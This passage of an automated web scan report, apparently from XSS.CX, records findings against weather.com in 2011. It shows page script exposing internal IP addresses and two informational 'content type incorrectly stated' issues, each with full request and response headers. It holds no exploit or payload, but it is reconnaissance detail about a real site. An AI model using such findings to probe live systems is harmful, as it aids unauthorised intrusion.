HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Language: en-US Content-Type: text/html;charset=ISO-8859-1 Server: Apache Vary: Accept-Encoding SVRNAME: web2x11 Date: Thu, 24 Mar 2011 17:33:32 GMT Connection: keep-alive Content-Length: 116103 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="co...[SNIP]... <script type="text/javascript"> // Global Cache busting section var remoteAddr="172.16.183.25 "; var cssSpot = '/v.20101026.1'; var extdivtoolsVAR = '/v.20101222.3'; var triggerParamsstdLauncherVAR = '/v.20100929.6'; var bust_hat = '/v.20100727.0'; var bust_globalNav='/v....[SNIP]... cial ads test code if (adTest) { if ((remoteAddr.indexOf("10.") == 0)|| (remoteAddr.indexOf("169.254.") == 0)|| (remoteAddr.indexOf("192.168.") == 0)|| (remoteAddr.indexOf("172.16.24.25 ") == 0)) { OAS_host=adTest; } } OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11); f...[SNIP]...
7. Content type incorrectly stated
previous
There are 2 instances of this issue:
7.1. http://www.weather.com/pagelet/loc/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.weather.com
Path:
/pagelet/loc/
Issue detail
The response contains the following Content-type statement:Content-Type: text/html;charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain XML .
Request
GET /pagelet/loc/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fsr.a=1300987732569; fv=1
Response
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:28:19 GMT Expires: Thu, 24 Mar 2011 17:41:53 GMT Cache-Control: max-age=900Content-Type: text/html;charset=UTF-8 Server: Apache SVRNAME: wxii2x02 X-Cache-Hits: 1 X-Varnish: 2184439133 2184417570 X-Varnish-Hashed-On: yahoo Vary: Accept-Encoding Content-Length: 1241 <ul class="twc-weather-locations" id="twc-weather-locations-id"> ...[SNIP]...
7.2. http://www.weather.com/pagelet/metrics/
previous
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.weather.com
Path:
/pagelet/metrics/
Issue detail
The response contains the following Content-type statement:Content-Type: text/html;charset=UTF-8 The response states that it contains HTML . However, it actually appears to contain CSS .
Request
GET /pagelet/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fsr.a=1300987732569; fv=1
Response
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:28:19 GMT Expires: Thu, 24 Mar 2011 17:33:19 GMT Cache-Control: max-age=300Content-Type: text/html;charset=UTF-8 Server: Apache SVRNAME: wxii2x02 X-Varnish: 2184480864 Vary: Accept-Encoding Content-Length: 285 YAHOO.metrics.createMetrics({level1:"HOMEPAGE", level2:"COMMON", level3:"", level4:"", level5:"", level6:"", contentType:"", detail:"", title:"", pagename:"/index.html", ad_category:...[SNIP]...
Report generated by XSS.CX at Thu Mar 24 12:46:13 CDT 2011.